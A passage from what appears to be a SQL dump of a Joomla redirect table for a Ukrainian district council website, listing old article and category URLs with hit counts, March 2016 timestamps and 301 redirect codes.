00:00:00',301),(27888,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=919:2013-01-31-10-15-40&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 02:03:07','0000-00-00 00:00:00',301),(27889,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&id=46&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-31 02:07:20','0000-00-00 00:00:00',301),(27890,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=816:2012-11-14-16-33-01&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 02:07:22','0000-00-00 00:00:00',301),(27891,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&__543__lang=en&id=49&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-03-31 02:10:43','0000-00-00 00:00:00',301),(27892,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&id=49:--12042013-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-03-31 02:17:31','0000-00-00 00:00:00',301),(27893,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44?start=21','','','',2,0,'2016-03-31 02:18:26','0000-00-00 00:00:00',301),(27894,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=876:2012-12-18-09-32-45&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 02:27:33','0000-00-00 00:00:00',301),(27895,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1125:2013-10-31-07-20-16&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 02:45:00','0000-00-00 00:00:00',301),(27896,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10&id=1271:2014-04-09-05-14-20&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 02:55:25','0000-00-00 00:00:00',301),(27897,'http://www.malyn-rayrada.org.ua/index.php?id=38&Itemid=73&lang=ru&layout=blog&limitstart=25&option=com_content&view=category','','','',1,0,'2016-03-31 03:13:55','0000-00-00 00:00:00',301),(27898,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=722:2012-06-15-13-56-24&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 03:24:14','0000-00-00 00:00:00',301),(27899,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=897:2013-01-18-07-40-55&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 03:32:24','0000-00-00 00:00:00',301),(27900,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=718:2012-06-14-15-24-50&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 03:47:31','0000-00-00 00:00:00',301),(27901,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=778:2012-10-03-08-53-07&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 03:58:32','0000-00-00 00:00:00',301),(27902,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=968:-2012-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 04:12:02','0000-00-00 00:00:00',301),(27903,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=957:199-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-31 04:18:22','0000-00-00 00:00:00',301),(27904,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=748:2012-08-12-17-56-55&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 04:18:23','0000-00-00 00:00:00',301),(27905,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=892:2013-01-08-13-26-18&lang=en&option=com_content&view=article','','','',1,0,'2016-03-31 04:55:35','0000-00-00 00:00:00',301),(27906,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1078:-2007-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 05:08:50','0000-00-00 00:00:00',301),(27907,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=928:2013-02-21-09-10-17&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 05:18:58','0000-00-00 00:00:00',301),(27908,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=555:2012-01-27-13-50-13&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 05:58:29','0000-00-00 00:00:00',301),(27909,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=815:-16-6-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 06:17:03','0000-00-00 00:00:00',301),(27910,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1153:-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 06:38:44','0000-00-00 00:00:00',301),(27911,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=941:2013-02-27-14-30-15&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 06:38:45','0000-00-00 00:00:00',301),(27912,'http://www.malyn-rayrada.org.ua/index.php?Itemid=1&id=2&lang=ru&option=com_phocagallery&view=category','','','',1,0,'2016-03-31 06:47:20','0000-00-00 00:00:00',301),(27913,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=616:----l-r&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 06:48:51','0000-00-00 00:00:00',301),(27914,'http://www.malyn-rayrada.org.ua/index.php?Itemid=39&catid=16:2010-06-06-10-55-25&id=20:-2009-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 06:53:24','0000-00-00 00:00:00',301),(27915,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=192:2010-12-15-13-29-12&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 06:55:44','0000-00-00 00:00:00',301),(27916,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1086:2013-09-16-13-00-16&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 06:58:25','0000-00-00 00:00:00',301),(27917,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1044:2013-07-05-11-26-05&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 06:58:27','0000-00-00 00:00:00',301),(27918,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=312:-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 07:10:48','0000-00-00 00:00:00',301),(27919,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=861:------qq&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 07:22:57','0000-00-00 00:00:00',301),(27920,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=205:--------2011--&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 07:37:01','0000-00-00 00:00:00',301),(27921,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=450:-l-2011-2013-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 07:48:59','0000-00-00 00:00:00',301),(27922,'http://www.malyn-rayrada.org.ua/index.php?Itemid=6&catid=5:2010-06-05-12-51-34&id=166:-6-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 08:12:48','0000-00-00 00:00:00',301),(27923,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1060:2013-07-27-10-13-15&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 08:12:49','0000-00-00 00:00:00',301),(27924,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1093:------------2017-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 08:12:51','0000-00-00 00:00:00',301),(27925,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=912:2013-01-22-14-14-06&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 08:13:14','0000-00-00 00:00:00',301),(27926,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=841:2012-12-10-13-54-17&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 08:19:35','0000-00-00 00:00:00',301),(27927,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=718:2012-06-14-15-24-50&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 08:19:40','0000-00-00 00:00:00',301),(27928,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&id=59&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-31 08:19:41','0000-00-00 00:00:00',301),(27929,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=486:-l-28r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 08:29:59','0000-00-00 00:00:00',301),(27930,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=703:-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 08:46:05','0000-00-00 00:00:00',301),(27931,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=846:2012-12-10-14-06-00&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 08:47:39','0000-00-00 00:00:00',301),(27932,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=411:------------2014-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 09:35:39','0000-00-00 00:00:00',301),(27933,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1063:2013-08-02-17-32-04&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 09:35:52','0000-00-00 00:00:00',301),(27934,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=682:-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 09:44:44','0000-00-00 00:00:00',301),(27935,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1207:-----------------2007-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2016-03-31 09:46:19','0000-00-00 00:00:00',301),(27936,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=411:-2014-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 09:54:38','0000-00-00 00:00:00',301),(27937,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=805:2012-10-30-13-35-53&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 10:30:30','0000-00-00 00:00:00',301),(27938,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=639:2012-04-03-12-41-18&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 10:41:39','0000-00-00 00:00:00',301),(27939,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=875:-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-31 11:21:08','0000-00-00 00:00:00',301),(27940,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&id=54&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-31 11:21:09','0000-00-00 00:00:00',301),(27941,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=950:2013-03-06-13-10-57&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 11:24:18','0000-00-00 00:00:00',301),(27942,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=892:2013-01-08-13-26-18&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-31 11:25:56','0000-00-00 00:00:00',301),(27943,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1196:2014-01-30-14-12-50&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 11:26:00','0000-00-00 00:00:00',301),(27944,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34&id=343:-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 11:33:48','0000-00-00 00:00:00',301),(27945,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=211:2010-12-15-14-46-24&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 11:33:49','0000-00-00 00:00:00',301),(27946,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=813:2012-11-12-16-44-40&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 11:34:26','0000-00-00 00:00:00',301),(27947,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=911:2013-01-22-13-27-41&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 11:45:20','0000-00-00 00:00:00',301),(27948,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=786:-5-18112009-429-l-r&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 11:51:02','0000-00-00 00:00:00',301),(27949,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=926:2013-02-21-09-02-30&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 12:00:22','0000-00-00 00:00:00',301),(27950,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 12:20:26','0000-00-00 00:00:00',301),(27951,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1287:2014-04-23-06-49-34&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 13:03:17','0000-00-00 00:00:00',301),(27952,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=513:-lr-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 13:03:18','0000-00-00 00:00:00',301),(27953,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=823:2012-11-14-16-52-28&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 13:09:40','0000-00-00 00:00:00',301),(27954,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1074:2013-09-02-05-02-30&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 13:09:41','0000-00-00 00:00:00',301),(27955,'http://www.malyn-rayrada.org.ua/index.php?Itemid=78&id=41:--27042012-&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-31 13:10:05','0000-00-00 00:00:00',301),(27956,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&__543__lang=en&id=49&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2016-03-31 13:20:39','0000-00-00 00:00:00',301),(27957,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=861:------qq&lang=en&option=com_content&view=article','','','',2,0,'2016-03-31 13:52:24','0000-00-00 00:00:00',301),(27958,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=562:-19122011194-30122011202&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 13:52:25','0000-00-00 00:00:00',301),(27959,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1089:--------l---r---&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 13:52:26','0000-00-00 00:00:00',301),(27960,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-31 14:26:41','0000-00-00 00:00:00',301),(27961,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=771:-2012-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-31 14:36:04','0000-00-00 00:00:00',301),(27962,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1001:2013-04-30-12-14-17&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 14:38:59','0000-00-00 00:00:00',301),(27963,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=203:2010-12-15-14-10-45&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 14:39:19','0000-00-00 00:00:00',301),(27964,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1060:2013-07-27-10-13-15&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 14:43:23','0000-00-00 00:00:00',301),(27965,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&id=53&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-31 14:44:34','0000-00-00 00:00:00',301),(27966,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&id=33:-20052011&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2016-03-31 15:01:00','0000-00-00 00:00:00',301),(27967,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=2010:&catid=2010&lang=en','','','',2,0,'2016-03-31 15:08:59','0000-00-00 00:00:00',301),(27968,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=714:2012-06-14-15-15-43&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 15:20:19','0000-00-00 00:00:00',301),(27969,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/654-urochistosti-z-nagodi-zavershennja-remontu-shkoli?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-03-31 15:21:19','0000-00-00 00:00:00',301),(27970,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1377:-23-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 15:31:25','0000-00-00 00:00:00',301),(27971,'http://www.malyn-rayrada.org.ua/index.php?Itemid=6&catid=5:2010-06-05-12-51-34&id=519:-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 15:31:26','0000-00-00 00:00:00',301),(27972,'http://www.malyn-rayrada.org.ua/index.php?Itemid=6&catid=5&id=519:-2011-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 16:04:19','0000-00-00 00:00:00',301),(27973,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=851:-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-31 16:06:06','0000-00-00 00:00:00',301),(27974,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=844:-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 16:09:21','0000-00-00 00:00:00',301),(27975,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=327:2011-05-20-16-20-26&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 16:10:48','0000-00-00 00:00:00',301),(27976,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=665:-75-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 16:11:36','0000-00-00 00:00:00',301),(27977,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=330:2011-05-20-16-28-08&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 16:17:34','0000-00-00 00:00:00',301),(27978,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=587:2012-02-27-13-44-05&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-31 16:17:35','0000-00-00 00:00:00',301),(27979,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=696:-14-6-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 16:35:53','0000-00-00 00:00:00',301),(27980,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10&id=1271:2014-04-09-05-14-20&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 16:46:12','0000-00-00 00:00:00',301),(27981,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=329:2011-05-20-16-25-10&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 16:46:13','0000-00-00 00:00:00',301),(27982,'http://www.malyn-rayrada.org.ua/index.php?Itemid=58&catid=27:---1932-33-&id=142:2010-10-15-06-19-49&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 17:23:18','0000-00-00 00:00:00',301),(27983,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1203:-2014-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 17:49:39','0000-00-00 00:00:00',301),(27984,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=764:2012-09-26-12-58-07&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 17:50:16','0000-00-00 00:00:00',301),(27985,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=828:-q-q&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 17:51:13','0000-00-00 00:00:00',301),(27986,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=15&id=1163:2013-12-20-07-44-35&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 17:51:13','0000-00-00 00:00:00',301),(27987,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01?start=7','','','',2,0,'2016-03-31 18:42:21','0000-00-00 00:00:00',301),(27988,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1012:l-r&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 18:47:49','0000-00-00 00:00:00',301),(27989,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/1196-do-dnya-pratsivnikiv-lisovogo-gospodarstva?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-03-31 19:01:48','0000-00-00 00:00:00',301),(27990,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/1207-do-dnya-pratsivnikiv-lisu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-03-31 19:01:49','0000-00-00 00:00:00',301),(27991,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/624-istorija-uspihu-tov-junigran?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-03-31 19:01:51','0000-00-00 00:00:00',301),(27992,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/655-videozvit-tvorchogo-zvitu-hudozhnih-kolektiviv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-03-31 19:02:03','0000-00-00 00:00:00',301),(27993,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44?limitstart=0','','','',4,0,'2016-03-31 19:02:09','0000-00-00 00:00:00',301),(27994,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=545:2012-01-26-12-06-01&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-31 19:13:12','0000-00-00 00:00:00',301),(27995,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&id=38:--19122011-&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-31 19:13:14','0000-00-00 00:00:00',301),(27996,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/424-visti-iz-chopovich-za-materialami-trs-polissja','','','',8,0,'2016-03-31 19:17:25','0000-00-00 00:00:00',301),(27997,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=689:2012-05-29-17-48-13&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 19:20:36','0000-00-00 00:00:00',301),(27998,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=713:2012-06-14-15-13-57&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 19:26:38','0000-00-00 00:00:00',301),(27999,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1266:2014-04-03-05-25-14&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 19:37:47','0000-00-00 00:00:00',301),(28000,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=421:2011-09-30-14-14-22&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 19:37:48','0000-00-00 00:00:00',301),(28001,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1059:2013-07-24-05-42-15&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 19:46:28','0000-00-00 00:00:00',301),(28002,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37:--21102011-&id=443:-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 19:46:29','0000-00-00 00:00:00',301),(28003,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=589:2012-02-27-13-52-30&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 20:01:34','0000-00-00 00:00:00',301),(28004,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45&lang=uk&layout=blog&limitstart=25&option=com_content&view=category','','','',1,0,'2016-03-31 20:09:37','0000-00-00 00:00:00',301),(28005,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=935:----------14-112012332-l------r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 20:19:53','0000-00-00 00:00:00',301),(28006,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/586-videozvit-iz-22-sesii-malinskoi-rajonnoi-radi/','','','',1,0,'2016-03-31 20:24:02','0000-00-00 00:00:00',301),(28007,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=733:-10-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-31 20:26:46','0000-00-00 00:00:00',301),(28008,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=589:2012-02-27-13-52-30&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 20:26:50','0000-00-00 00:00:00',301),(28009,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1153:-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 20:36:13','0000-00-00 00:00:00',301),(28010,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=637:2012-04-03-12-34-11&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 20:55:19','0000-00-00 00:00:00',301),(28011,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=778:2012-10-03-08-53-07&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 21:10:15','0000-00-00 00:00:00',301),(28012,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1188:2014-01-28-09-45-21&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 21:15:01','0000-00-00 00:00:00',301),(28013,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1109-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnikh-dilyanok-yaki-nadayutsya-v-orendu-gr-yakimenko-n-m','','','',1,0,'2016-03-31 21:20:52','0000-00-00 00:00:00',301),(28014,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1098-pro-zvernennya-do-derzhavnoji-finansovoji-inspektsiji-v-zhitomirskij-oblasti-shchodo-vklyuchennya-malinskogo-rajonu-v-plan-kompleksnikh-perevirok-na-2015-rik','','','',1,0,'2016-03-31 21:23:05','0000-00-00 00:00:00',301),(28015,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1160-pro-vnesennya-zmin-do-rishennya-rajonnoji-radi-vid-16-11-2010r-5-pro-utvorennya-postijnikh-komisij-rajonnoji-radi-zatverdzhennya-jikh-skladu-ta-obrannya-goliv-komisij','','','',1,0,'2016-03-31 21:23:45','0000-00-00 00:00:00',301),(28016,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1161-pro-zatverdzhennya-rajonnoji-programi-zabezpechennya-provedennya-protiepizootichnikh-zakhodiv-u-malinskomu-rajoni-na-2015-2017-roki','','','',1,0,'2016-03-31 21:23:59','0000-00-00 00:00:00',301),(28017,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1162-pro-zgodu-na-peredachu-finansovogo-resursu-medichna-subventsiya-dlya-vikonannya-delegovanikh-povnovazhen-po-medichnomu-obslugovuvannyu-naselennya-rajonu','','','',1,0,'2016-03-31 21:24:27','0000-00-00 00:00:00',301),(28018,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1163-pro-peredachu-primishchennya-lyubovitskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-lyubovitskoji-silskoji-radi','','','',1,0,'2016-03-31 21:24:55','0000-00-00 00:00:00',301),(28019,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1166-pro-khid-vikonannya-rajonnoji-programi-sotsialnoji-pidtrimki-vnutrishno-peremishchenikh-osib-z-timchasovo-okupovanoji-teritoriji','','','',1,0,'2016-03-31 21:25:52','0000-00-00 